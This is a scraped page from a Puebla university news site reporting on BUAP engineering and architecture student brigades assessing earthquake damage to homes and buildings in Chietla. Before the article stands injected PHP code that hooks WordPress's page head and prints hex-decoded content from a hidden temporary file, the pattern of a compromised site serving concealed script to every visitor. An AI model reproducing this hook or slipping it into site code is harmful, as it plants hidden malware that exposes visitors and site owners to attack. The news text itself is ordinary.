if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Brigadas de la BUAP llevan ayuda a Chietla – La Opinión Universitaria La Opinión Universitaria
Menu

Brigadas de la BUAP llevan ayuda a Chietla

Como parte del apoyo que brinda la Benemérita Universidad Autónoma de Puebla (BUAP) a las familias de las localidades afectadas por el sismo del pasado 19 de septiembre, brigadas integradas por estudiantes de las facultades de Arquitectura e Ingeniería de la BUAP recorrieron las calles del municipio de Chietla.

En un recorrido por parte de estos grupos que fueron acompañados por académicos, en casas, comercios y edificios públicos, realizaron una evaluación estructural de los inmuebles, para determinar los niveles de afectación de los mismos.

Los pobladores abrieron las puertas de sus hogares a los grupos de universitarios, con la esperanza de saber en qué condiciones se encuentran dichos espacios y tener la certeza de si deben permanecer o desalojar.

Los grupos se dividieron por secciones e inspeccionaron el poblado, desde el puente de la entrada que sufrió daños considerables; el edificio del DIF municipal, el cual a pesar de tener diversas grietas no representa una amenaza; así como viviendas, muchas afectadas o a punto de derrumbarse, por lo que de acuerdo con los dictámenes realizados, en estos casos, es necesaria su demolición para evitar riesgos.

La información recabada por los brigadistas será proporcionada al enlace estatal con el que cuenta el municipio, para establecer las acciones a seguir. A Chietla acudieron más de 140 universitarios, organizados en diferentes brigadas, 18 de la Facultad de Ingeniería y siete de la Facultad de Arquitectura.

  • No comments

    Deja una respuesta

    Tweets recientes